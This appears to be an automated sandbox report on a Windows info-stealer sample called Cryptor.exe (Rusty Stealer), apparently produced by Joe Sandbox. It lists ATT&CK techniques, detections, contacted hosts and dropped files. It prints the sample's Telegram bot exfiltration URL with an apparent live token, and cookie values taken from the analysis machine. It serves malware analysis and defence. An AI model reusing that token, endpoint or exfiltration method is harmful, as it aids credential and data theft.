Source: Yara match	File source: 00000000.00000003.1816751738.0000020DA5C09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1817452314.0000020DA5C09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1816891652.0000020DA5C09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Cryptor.exe PID: 6388, type: MEMORYSTR

Yara detected Rusty Stealer

Source: Yara match

File source: Process Memory Space: Cryptor.exe PID: 6388, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	31 Windows Management Instrumentation	1 DLL Side-Loading	11 Process Injection	1 Masquerading	1 OS Credential Dumping	21 Security Software Discovery	Remote Services	3 Data from Local System	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Abuse Elevation Control Mechanism	1 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Abuse Elevation Control Mechanism	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	4 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Obfuscated Files or Information	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Software Packing	DCSync	23 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Cryptor.exe	54%	ReversingLabs	Win32.Trojan.Generic
Cryptor.exe	47%	Virustotal		Browse
Cryptor.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Link
ipwho.is	0%	Virustotal	Browse
api.telegram.org	2%	Virustotal	Browse
fp2e7a.wpc.phicdn.net	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
http://crl.microsoft	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	Virustotal		Browse
https://api.telegram.org/bot6639722633:AAFNcbBsUJUAQOXZmv9IESvAjulFnDaVzUA/sendDocument?chat_id=-400	1%	Virustotal		Browse
https://cdn.ipwhois.io/flags/us.svg3	0%	Virustotal		Browse
https://duckduckgo.com/chrome_newtab	0%	Virustotal		Browse
https://docs.rs/getrandom#nodejs-es-module-supportCalling	0%	Virustotal		Browse
https://cdn.ipwhois.io/flags/us.svg	0%	Virustotal		Browse
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Virustotal		Browse
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ipwho.is	195.201.57.90	true	false	0%, Virustotal, Browse	unknown
api.telegram.org	149.154.167.220	true	true	2%, Virustotal, Browse	unknown
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	0%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ac.ecosia.org/autocomplete?q=	Cryptor.exe, 00000000.00000003.1702091587.0000020DA5C4C000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/chrome_newtab	Cryptor.exe, 00000000.00000003.1702091587.0000020DA5C4C000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://api.telegram.org/bot6639722633:AAFNcbBsUJUAQOXZmv9IESvAjulFnDaVzUA/sendDocument?chat_id=-400	Cryptor.exe, 00000000.00000003.1816591865.0000020DA5C48000.00000004.00000020.00020000.00000000.sdmp, Cryptor.exe, 00000000.00000003.1816996414.0000020DA5C58000.00000004.00000020.00020000.00000000.sdmp, Cryptor.exe, 00000000.00000003.1802367277.0000020DA5C48000.00000004.00000020.00020000.00000000.sdmp	false	1%, Virustotal, Browse	unknown
https://duckduckgo.com/ac/?q=	Cryptor.exe, 00000000.00000003.1702091587.0000020DA5C4C000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	Cryptor.exe, 00000000.00000003.1702091587.0000020DA5C4C000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://crl.microsoft	Cryptor.exe, 00000000.00000003.1816514495.0000020DA5C40000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	Cryptor.exe, 00000000.00000003.1702968791.0000020DA5C37000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	Cryptor.exe, 00000000.00000003.1702091587.0000020DA5C4C000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Cryptor.exe, 00000000.00000003.1702091587.0000020DA5C4C000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://cdn.ipwhois.io/flags/us.svg3	Cryptor.exe, 00000000.00000003.1816751738.0000020DA5BD3000.00000004.00000020.00020000.00000000.sdmp, Cryptor.exe, 00000000.00000002.1817360404.0000020DA5BD5000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Cryptor.exe, 00000000.00000003.1702091587.0000020DA5C4C000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	Cryptor.exe, 00000000.00000003.1702787122.0000020DA5C73000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	Cryptor.exe, 00000000.00000003.1702968791.0000020DA5C37000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	Cryptor.exe, 00000000.00000003.1702787122.0000020DA5C73000.00000004.00000020.00020000.00000000.sdmp, Cryptor.exe, 00000000.00000003.1703075101.0000020DA5C61000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	Cryptor.exe, 00000000.00000003.1702091587.0000020DA5C4C000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	Cryptor.exe, 00000000.00000003.1702091587.0000020DA5C4C000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e170	Cryptor.exe, 00000000.00000003.1703075101.0000020DA5C61000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://cdn.ipwhois.io/flags/us.svg	Cryptor.exe, 00000000.00000003.1816751738.0000020DA5BD3000.00000004.00000020.00020000.00000000.sdmp, Cryptor.exe, 00000000.00000002.1817360404.0000020DA5BD5000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://docs.rs/getrandom#nodejs-es-module-supportCalling	Cryptor.exe, 00000000.00000002.1818390971.00007FF6213B0000.00000040.00000001.01000000.00000003.sdmp	false	0%, Virustotal, Browse	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom		62041	TELEGRAMRU	true
195.201.57.90	ipwho.is	Germany		24940	HETZNER-ASDE	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1450341
Start date and time:	2024-06-01 18:36:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 47s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Cryptor.exe
Detection:	MAL
Classification:	mal92.troj.spyw.evad.winEXE@4/14@2/2
EGA Information:	Failed
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ocsp.edge.digicert.com, ctldl.windowsupdate.com
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
12:36:57	API Interceptor	1x Sleep call for process: Cryptor.exe modified
12:37:00	API Interceptor	4x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	9JVOOyGBXT.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	ajb5QcGVGK.exe	Get hash	malicious	DCRat	Browse
	SecuriteInfo.com.Trojan.AutoIt.1390.21633.8031.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	Attachments.zip	Get hash	malicious	Unknown	Browse
	DHL DOC..exe	Get hash	malicious	AgentTesla	Browse
	hesaphareketi-01.exe	Get hash	malicious	AgentTesla	Browse
	sipari#U015f formu_831512.exe	Get hash	malicious	AgentTesla	Browse
	Due Invoice pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer, XWorm	Browse
	RFQ.exe	Get hash	malicious	AgentTesla	Browse
	SecuriteInfo.com.Heuristic.HEUR.AGEN.1309146.31110.1872.exe	Get hash	malicious	RedLine, XWorm	Browse
195.201.57.90	rust-stealer-xss.exe	Get hash	malicious	Discord Token Stealer, Luca Stealer	Browse	/?output=json
	Build.exe	Get hash	malicious	Luca Stealer, Quasar	Browse	/?output=json
	rust-stealer-xss.exe	Get hash	malicious	Luca Stealer, Rusty Stealer	Browse	/?output=json
	3r3usOVGsa.exe	Get hash	malicious	BlackGuard	Browse	ipwhois.app/xml/
	KvVXVfYvlF.exe	Get hash	malicious	BlackGuard, SmokeLoader	Browse	ipwhois.app/xml/
	file.exe	Get hash	malicious	BlackGuard	Browse	ipwhois.app/xml/
	file.exe	Get hash	malicious	BlackGuard	Browse	ipwhois.app/xml/
	file.exe	Get hash	malicious	BlackGuard	Browse	ipwhois.app/xml/
	JFBYfxYeTO.exe	Get hash	malicious	BlackGuard	Browse	ipwhois.app/xml/
	JHtrZ0tgun.exe	Get hash	malicious	BlackGuard	Browse	ipwhois.app/xml/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ipwho.is	rust-stealer-xss.exe	Get hash	malicious	Discord Token Stealer, Luca Stealer	Browse	195.201.57.90
	Build.exe	Get hash	malicious	Luca Stealer, Quasar	Browse	195.201.57.90
	KR6nDu9fLhop1bFe.exe	Get hash	malicious	Quasar	Browse	195.201.57.90
	rust-stealer-xss.exe	Get hash	malicious	Luca Stealer, Rusty Stealer	Browse	195.201.57.90
	http://nxxoui9ah5qto.pages.dev/smart89	Get hash	malicious	Unknown	Browse	195.201.57.90
	01vwXiyQ8K.exe	Get hash	malicious	Quasar	Browse	195.201.57.90
	http://amht38eh3e3f98ox0ld1rc4h3fjcowz98ldjp5hek8.pages.dev/	Get hash	malicious	Unknown	Browse	195.201.57.90
	SecuriteInfo.com.Trojan.PWS.Stealer.36926.32356.23713.exe	Get hash	malicious	Unknown	Browse	147.135.36.89
	SecuriteInfo.com.Trojan.PWS.Stealer.36926.32356.23713.exe	Get hash	malicious	Unknown	Browse	195.201.57.90
	https://jjl66-secondary.z8.web.core.windows.net/werrx01USAHTML/?bcda=1-844-293-1010	Get hash	malicious	TechSupportScam	Browse	195.201.57.90
api.telegram.org	9JVOOyGBXT.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	ajb5QcGVGK.exe	Get hash	malicious	DCRat	Browse	149.154.167.220
	SecuriteInfo.com.Trojan.AutoIt.1390.21633.8031.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220
	Attachments.zip	Get hash	malicious	Unknown	Browse	149.154.167.220
	DHL DOC..exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	hesaphareketi-01.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	sipari#U015f formu_831512.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	Due Invoice pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer, XWorm	Browse	149.154.167.220
	RFQ.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	SecuriteInfo.com.Heuristic.HEUR.AGEN.1309146.31110.1872.exe	Get hash	malicious	RedLine, XWorm	Browse	149.154.167.220
fp2e7a.wpc.phicdn.net	file.exe	Get hash	malicious	Clipboard Hijacker, PureLog Stealer, RisePro Stealer, zgRAT	Browse	192.229.221.95
	SecuriteInfo.com.Win64.Evo-gen.4435.12354.exe	Get hash	malicious	CryptOne, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer	Browse	192.229.221.95
	https://1drv.ms/o/s!Ale5u7cgFrqDgrU1Y9FuTirE1RVPjA?e=U3XZbQ	Get hash	malicious	SharepointPhisher	Browse	192.229.221.95
	QT-2402078.scr.exe	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://login.palmspringsvrbo.com	Get hash	malicious	Unknown	Browse	192.229.221.95
	CT200.cmd.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	192.229.221.95
	https://login.palmspringsvrbo.com/?26051923	Get hash	malicious	Unknown	Browse	192.229.221.95
	Employee Handbook English.exe	Get hash	malicious	AgentTesla	Browse	192.229.221.95
	http://new-flirt.click/?f=qqrntu&s=687474703a2f2f646174696e6773722e636f6d2f6e65772f3f733d383426263533313839333833383938383631372664693d37672d323031382665643d64657526693d61646d696e38342c38323039372c526f6e6e792e4a61656765724064657574736368656261686e2e636f6d2c2674733d3137313730373738313726313133383530393031393535373338&	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://lifetimeagriculturalproducer.com/watch.1366627561707?key=f02bf7f95ce614ece659fd3b99a43ebf&kw=%5B%2230-05-2024%22,%22nee%22,%22naan%22,%22kadhal%22,%22%E2%80%A2%22,%22thiraithee%22%5D&refer=https://thiraithee.net/vijay-tv-programs/nee-naan-kadhal/30-05-2024-nee-naan-kadhal/&tz=-4&dev=r&res=14.31&uuid=	Get hash	malicious	Unknown	Browse	192.229.221.95

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	SecuriteInfo.com.Win64.Evo-gen.4435.12354.exe	Get hash	malicious	CryptOne, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer	Browse	149.154.167.99
	9JVOOyGBXT.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	ajb5QcGVGK.exe	Get hash	malicious	DCRat	Browse	149.154.167.220
	http://www.aviatorx.sbs.recl.cc/	Get hash	malicious	Unknown	Browse	149.154.167.99
	http://telegram-vn.com/	Get hash	malicious	Unknown	Browse	149.154.167.99
	http://dl.dir.freefiremobile.com.sg5.putrivpn.biz.id/	Get hash	malicious	Unknown	Browse	149.154.167.99
	http://b9824.top/	Get hash	malicious	Unknown	Browse	149.154.170.96
	Rtq5bR0yeF.exe	Get hash	malicious	RedLine	Browse	149.154.167.99
	file.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	SecuriteInfo.com.Trojan.AutoIt.1390.21633.8031.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220
HETZNER-ASDE	SecuriteInfo.com.Win64.Evo-gen.4435.12354.exe	Get hash	malicious	CryptOne, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer	Browse	159.69.102.132
	3Lf408k9mg.exe	Get hash	malicious	PureLog Stealer, SystemBC	Browse	116.202.102.103
	PAYMENT RECEIPT.exe	Get hash	malicious	FormBook	Browse	178.63.50.103
	RFQ price list.scr.exe	Get hash	malicious	Unknown	Browse	88.99.137.18
	Revised Order.exe	Get hash	malicious	DarkTortilla, FormBook	Browse	135.181.212.206
	RFQ price list.scr.exe	Get hash	malicious	Unknown	Browse	88.99.137.18
	QT-2402078.scr.exe	Get hash	malicious	Unknown	Browse	88.99.137.18
	QT-2402078.scr.exe	Get hash	malicious	Unknown	Browse	88.99.137.18
	DHL Newly Arrived Parcel.exe	Get hash	malicious	FormBook	Browse	135.181.212.206
	r6LSllSl3M.exe	Get hash	malicious	Cobian RAT	Browse	49.13.194.118

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	SecuriteInfo.com.Win32.Malware-gen.18534.23013.exe	Get hash	malicious	AsyncRAT, DcRat	Browse	149.154.167.220
	Authenticator.exe	Get hash	malicious	BazaLoader	Browse	149.154.167.220
	Payment Advice Ref 20240516908654223454899.scr.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	Aviz de Plata_Comert_Bank_pdf.scr.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	IKwhIZp9xe.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220
	Aviz de Plata_Comert_Bank_pdf.scr.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	Biodu Kenya Ltd.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	file.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	PROFORMA INV.pif.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	149.154.167.220
	Aviso_de_Pagamento_Banco_Montepio_pdf.scr.exe	Get hash	malicious	Unknown	Browse	149.154.167.220

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:NlllulJnp/p:NllU
MD5:	BC6DB77EB243BF62DC31267706650173
SHA1:	9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
SHA-256:	5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
SHA-512:	91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e.................................X..............@..........

C:\Users\user\AppData\Local\Temp\Cookies

Download File

Process:	C:\Users\user\Desktop\Cryptor.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\GUSNUBAIEi2BKK2Fv27qNATlfJxDpw\Cookies\Chrome_Default_Network.txt

Download File

Process:	C:\Users\user\Desktop\Cryptor.exe
File Type:	ASCII text, with very long lines (522), with CRLF line terminators
Category:	dropped
Size (bytes):	3348
Entropy (8bit):	5.8371611195815145
Encrypted:	false
SSDEEP:	96:4JMcoO2gFcRqFZL2buiCsNv3pfKUhRG3qsyXw4B2cksi:euFRiyikNy
MD5:	26DE0E8E10E90A47229AEC7215CCD2DD
SHA1:	631ACCA2F37A1191AAB5786BC4CBF8D67085930D
SHA-256:	7C2C1C38CD5A51DEC76A80A18C1428151A8AB8E8AC21C519BF3E18D53B4261EB
SHA-512:	E5AA19052EFAB810E196FB2E7CD7061CFC28E3AD881DB1DEA65CD94F748812086CE455ED44001FB7676DF515B62F8141010EAD9EE6343AC18B25901CC3C24D8B
Malicious:	false
Reputation:	low
Preview:	.google.com.true./.true.13356618603686193.NID.511=j8SQUTltnVU5cOAeyzqSxW-qHOakRuBHDQGLTGeceC9Z5rRzk5trMKb4CuZC_CFmc7KFwQcRJL-qGz8MvkkzMZmElvXAFWLO-TPZ9PMqBYA78ZAuaepnXIRHe-TAolVoW6Z7dQnqpgyX0m-TmS72bebAgoqZv5GkpRFUcZIw1Kk..support.microsoft.com.false./.true.13340887435186329..AspNetCore.AuthProvider.True..support.microsoft.com.true./signin-oidc.true.13340887735359381..AspNetCore.Correlation.mdRqPJxLbpyv7vX0eK9YkTR-xwcrW3VBLE4Y3HEvxuU.N..support.microsoft.com.true./signin-oidc.true.13340887735359334..AspNetCore.OpenIdConnect.Nonce.CfDJ8Kiuy_B5JgFMo7PeP95NLhqwcJ8koDy5pXkfoWsb5SbbU2hVCbsH2qt9GF_OVCqFkLEwhvzeADNQOF5RSmkDfh5RqfqlOkx5QWo4Lltvwb0CvwBFD8ujlm3BAglOeGca3ZatkLMUkHB6alahUr8qJ7G_3AejtooymTWCzyO89hshJeX8Gh78kohbIw0IQY4v6LZriT4P2fGeBSMjrvqODB4H_bs2nbfsSfL7aN-SiX4Yyn3iFo5fv-Rsj0cGE-FFrP1uXNT7Y1VSMOfm-L0RnS8.N..support.office.com.true./.true.13372509232238068.EXPID.8e067c40-5461-4aef-885f-2c92ce6a5474...microsoft.com.false./.true.13372422837017624.MC1.GUID=749eee6039c5489b9db3000c7ab3f

C:\Users\user\AppData\Local\Temp\GUSNUBAIEi2BKK2Fv27qNATlfJxDpw\screen1.png

Download File

Process:	C:\Users\user\Desktop\Cryptor.exe
File Type:	PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	871427
Entropy (8bit):	7.514766155251014
Encrypted:	false
SSDEEP:	12288:S1EkzYgTbaEK6qHsLLLD1aaUqmdZZvp1fJW+JzNfCPBKKrBXDErr3Gcs+1:SSyz3aDtOLvIaUqKvppJW+JsBTEX3Rsu
MD5:	52ACFDA7A0F4C6D36E7AFF1BB2EACD1E
SHA1:	B5066529D2DCFF3301A7326F272C7AFFAA2A1488
SHA-256:	D9433DF29A2A6758BEAA025B537C590297F564737CBAB74F62191C0E6B160507
SHA-512:	CD6CF3F4877A7DB357F2CED13E19AE287D45C85CCF76715DA5DBC459461708C8C3BA0D8CB6AA4ECE6F7A471A5F6B14F2A7CA8ED78AFFD149C3A3C2A3B9AA6A11
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR................C..K.IDATx.....$I.$I.....GDDfffVUUUUwwwww......................................................................................twwwwWWUUUUffFFD......LfWwuwwO.....L...}..*y...'.y..+.l.%2.)ls....6..<...n.s...$I..?....6....m.#...B...6..a./......d..E.g.^..02.f....\f.I<.m....E....6...>...P..Ti.#.._C<'..{..~.a..f..F...m.-...l.f.oa.+.....m^..9..2...y....6...BI.6.yad./...\f....$.l.`..I..6...m.l#....~...@.l.y.4...s...c..tQ..s...m$!..D....M...\&..$.g........#3..$.2...$. ....6..L.".....`V;2..m.$q.. 3..@D ....6/.....6..."..`.G$....6..D..Mfb.IH"3....l.mZkd&.A.....$..m..!....6...M)..t].m.i""..m$.....$$......~....2M..I)....6....m$..H"....$$a....&3...$.$.....@...L.$!.$.d&.....2...6...".....I)..H""..L.$a..I.d&...$.R..m$!..d&..$$.....~...@)..`.&."...d..T..Ak.Z+.V.i...m.i"3). .....q..@...Mf..H"".L2..D...U2..D...m.q$....&.If.../"..$.2...6..$.(".Df..H....8.d&..@f.PJ.6..`...O..Af.0M.}.Ske.^s?..D....@D....IHB..If...R....ls?.R.Dk........d&...... "h.1...m2..IB..

C:\Users\user\AppData\Local\Temp\GUSNUBAIEi2BKK2Fv27qNATlfJxDpw\sensitive-files.zip

Download File

Process:	C:\Users\user\Desktop\Cryptor.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	14986
Entropy (8bit):	7.825969307820179
Encrypted:	false
SSDEEP:	384:BP8iBh49agvSv/kX1ZIP8iBh49agvSv/kX1ZT+:98c49XvSv/kFZU8c49XvSv/kFZq
MD5:	6AC5CB240B1E6DCF4A32C5654DBD47B1
SHA1:	410BEAEE88F8583C262B55726808F8DB608A9FE3
SHA-256:	896E9138581E56AD91F482A6CCCCB48FEAD0668B0CA90BEA80EEF31CB2F123BF
SHA-512:	ADA51F0DDA302BBFD1A96113D76429E4A24DC7817EA694B03DC41BC1EF124B0BA1EF0CF72759CCBEFCF34BB624C852F7513D994AF5C462BE782BA8508F3F2735
Malicious:	false
Reputation:	low
Preview:	PK........,..X...............DVWHKMNFNN.png..Ir@!.D....?....p...l....aeA..K...E.....[.ph..kQ..T..j.uUnVT.$U...K7+}lZ..I.](.X..5b>..M.".uSl....u....\|.c..'}.U ....2.'....U0A..*qO..v.9X.Z...n.E}....us..,]...[g.:..-...6:_.PK...H...=..P...q....).@d^..Ou..W.S.=.....d..[!..L...rr]C.M&S.E}.e:>K.[...U.......;.F.Z.vW.6.,.r.[...hh;......\.Cm.p......-_..d..Q.. .i.6..J..........\|.C.Dp.....).....o8.,...SV..2\$p.eNG......^.(-....7...RA.j......q..U;...<#VZ.Ut...6......h.........2.Kf......j8.......>W...u...4..d..z.>...s..9.p.Q.)...t<...`.m..R.(.\|w.!.....J.y.]j...-......[.-{3..W.=..\.M<O..$...}...G.;n..N.......w.W...f..$.y.$jw...N7..=:.....K..=..."[?2....PK........,..XP..............HTAGVDFUIE.jpg..Ir@!.D.....#..N.?H..(.._d....\....7...0...Q.}SU]?P:]p......X?:i.L.L.Z....k. ..4.. 